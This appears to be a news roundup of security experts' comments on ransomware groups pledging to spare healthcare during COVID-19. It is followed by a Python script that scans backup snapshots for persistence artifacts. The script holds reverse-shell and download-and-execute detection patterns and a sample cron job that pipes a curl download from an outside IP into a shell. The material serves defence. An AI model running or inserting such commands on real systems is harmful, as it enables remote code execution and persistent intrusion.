In response to the Bleeping Computer report that explains some ransomware operators have agreed to no longer target health and medical organizations during the pandemic, experts from cybersecurity firms Cerberus Sentinel and KnowBe4 offer perspective.
Certain malware campaigns can cause huge amounts of collateral damage, such as Petya’s inadvertent impact on the global manufacturing industry. For this reason, we shouldn’t fully trust popular ransomware operators like Maze, DoppelPaymer, Ryuk, Sodinokibi/REvil, PwndLocker, and Ako to fully avert inflicting collateral damage on the healthcare and medical industries.
With this in mind, when it comes to protecting healthcare and medical organisations, my advice remains the same: a defence-in-depth approach must be adopted to ensure that many layers of protection are in place in order to defend critical infrastructures as well as any sensitive digital assets.
This begins with a strong and effective data backup strategy with regular tests conducted to ensure data confidentiality, integrity and availability remains fit for purpose if disaster strikes. Secondly, a robust endpoint protection solution must be deployed and combined with traditional malware protection and behaviour analysis to detect and deter even the most advanced malware attacks. Finally, it’s vital security technology controls such as regular vulnerability assessments, web application firewalls, network content scanners, network intrusion protection systems, and data leakage prevention systems are in place, to augment healthcare and medical organisations’ ability to defend better against even the most persistent ransomware operators.
We do believe that the two main hacking groups (Maze and Doppelpaymer) who mentioned they will not attack will keep their word. However, to our knowledge, one of the most talked about groups over the last couple of months – Sodinokibi – has not yet responded to what their actions will be regarding COVID-19-related attacks. In addition, there are endless smaller hacking groups and threat actors that also didn’t specifically state that they won’t attack and at any given time they can decide to do so.
While this is welcome news, let’s not let this make us think these are good people running these ransomware gangs. More likely, they are probably aware that targeting these sorts of places during a global pandemic would push them straight into the spotlight as the most hated people in the world and would bring law enforcement and global pressure on them in ways they do not want. Let’s face it, these groups already walk a tight line, and being responsible for the loss of human lives during a time like this would open up the hunt for them with additional resources they do not want to deal with. Most are in the business to make money and they weigh that with the risk of being caught. Causing issues now in healthcare would simply tip those scales to the “too risky” side of the equation.
Just because ransomware operators are agreeing to avoid attacks on medical facilities does not mean other attackers are not trying to benefit from this event, so organizations cannot leave their guard down. As a matter of fact, here at KnowBe4, we have seen the number of reported coronavirus-themed phishing and scams explode since Monday, March 16th. Organizations in all industries need to ensure that they are training people to spot and report these attacks, even if ransomware operators are stepping back these other attacks are not going anywhere soon.
These are strange times indeed that we are living in. It is not the first time, though, that a ransomware operator has shown leniency towards victims or targets. In the past there have been cases where ransomware has been removed for free when the victim demonstrated they were genuinely unable to afford the ransom or it hit some critical service.
And while some criminal gangs may be trying to be honest in their intentions to not target health and medical organisations, there is no guarantee that all criminal organisations or lone operators share the same values. It is also not always possible to correctly identify medical institutes and they still may be inadvertently targeted.
Ultimately, medical and all other organisations cannot rely on the goodwill of criminals not to target them during a time of weakness. Rather, organisations should be prepared at all times for attacks, both by having the right technologies in place, and also by providing the right security awareness and training to employees to help them identify and report any potential ransomware attacks.
Healthcare organizations should absolutely not trust cybercriminals to halt operations during the COVID-19 pandemic. Information we are seeing is that malware authors and hacking forum administrators are asking the hackers they support not to stop breaking into businesses, but rather to delay launching their ransomware or other extortion tools until the pandemic passes. The motivation is not altruistic, but instead selfishly concerned that the criminals won’t be paid while their victims are shut down in responding to the pandemic. Healthcare organizations especially should remain vigilant that attackers may be resident with backdoors in their networks for weeks or months before launching their ransomware tools. Because of this extended delay between breaching and extorting, the backdoors used to maintain access can be copied into the organization’s backups, meaning that restoring from them can restore cybercriminals’ access.
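The last point above, that a backdoor planted weeks before the ransomware is launched can be captured in backups and quietly reinstated by a restore, is one a recovery team can check for before bringing a snapshot back online. The following is an added example written for this page; it is not code from the article or from either firm's tooling. It assumes a Linux host backup mounted as a directory and a baseline manifest of SHA-256 hashes for persistence-related files taken from a known-good image; the snapshot contents and the baseline below are constructed for illustration. It flags files in common persistence locations that are missing from the baseline, differ from it, or contain download-and-execute or reverse-shell patterns.

```python
"""Check a mounted backup snapshot for persistence artifacts before restoring it.

Added example (not from the original article). Assumes a Linux host backup
mounted at a directory and a baseline manifest {relative path: sha256} taken
from a known-good image. The sample snapshot below is constructed inline.
"""
import hashlib
import os
import re
import tempfile

# Locations commonly used to keep a foothold on a Linux host (assumed list).
PERSISTENCE_PATHS = [
    "etc/crontab",
    "etc/cron.d",
    "etc/systemd/system",
    "root/.ssh/authorized_keys",
    "root/.bashrc",
]

# Content patterns that should not appear in cron jobs, units or shell rc files.
SUSPICIOUS_PATTERNS = [
    re.compile(r"(curl|wget)[^|\n]*\|\s*(ba)?sh\b"),  # download piped into a shell
    re.compile(r"base64\s+(-d|--decode)"),            # decoding an embedded payload
    re.compile(r"/dev/tcp/"),                         # bash reverse shell idiom
    re.compile(r"\bnc\s+(-e|-c)\s"),                  # netcat reverse shell
]


def sha256_file(path):
    """Hash a file's bytes with SHA-256."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        h.update(fh.read())
    return h.hexdigest()


def scan_snapshot(root, baseline):
    """Return a list of (relative path, reason) findings for the snapshot at root."""
    findings = []
    for rel in PERSISTENCE_PATHS:
        full = os.path.join(root, rel)
        if not os.path.exists(full):
            continue
        files = []
        if os.path.isdir(full):
            for dirpath, _, names in os.walk(full):
                files.extend(os.path.join(dirpath, n) for n in names)
        else:
            files.append(full)
        for f in files:
            relpath = os.path.relpath(f, root).replace(os.sep, "/")
            expected = baseline.get(relpath)
            digest = sha256_file(f)
            # Anything new or changed since the known-good image needs review.
            if expected is None:
                findings.append((relpath, "not in baseline"))
            elif expected != digest:
                findings.append((relpath, "hash differs from baseline"))
            # Independently of the baseline, look for obviously hostile content.
            with open(f, "r", errors="replace") as fh:
                text = fh.read()
            for pat in SUSPICIOUS_PATTERNS:
                if pat.search(text):
                    findings.append((relpath, "matches " + pat.pattern))
                    break
    return findings


def build_sample_snapshot():
    """Constructed sample: a legitimate crontab, an attacker-added cron job,
    and an authorized_keys file with an extra key. Returns (root, baseline)."""
    root = tempfile.mkdtemp()

    def write(rel, content):
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "w") as fh:
            fh.write(content)

    legit_cron = "0 2 * * * root /usr/local/bin/backup.sh\n"
    legit_keys = "ssh-ed25519 AAAA...legit admin@host\n"
    write("etc/crontab", legit_cron)
    write("etc/cron.d/update", "*/5 * * * * root curl -s http://203.0.113.10/x | sh\n")
    write("root/.ssh/authorized_keys", legit_keys + "ssh-ed25519 AAAA...added attacker\n")
    baseline = {
        "etc/crontab": hashlib.sha256(legit_cron.encode()).hexdigest(),
        "root/.ssh/authorized_keys": hashlib.sha256(legit_keys.encode()).hexdigest(),
    }
    return root, baseline


if __name__ == "__main__":
    snapshot_root, known_good = build_sample_snapshot()
    for path, reason in scan_snapshot(snapshot_root, known_good):
        print(f"{path}: {reason}")
```

Run against the constructed snapshot, the legitimate crontab passes, the added cron job is reported both as absent from the baseline and as a download-and-execute pattern, and the authorized_keys file is reported as changed. The baseline comparison is the part that matters most: a well-hidden implant will not match a regex, but it will still change a hash, so the manifest must come from an image taken before the suspected intrusion window, not from the backup being restored.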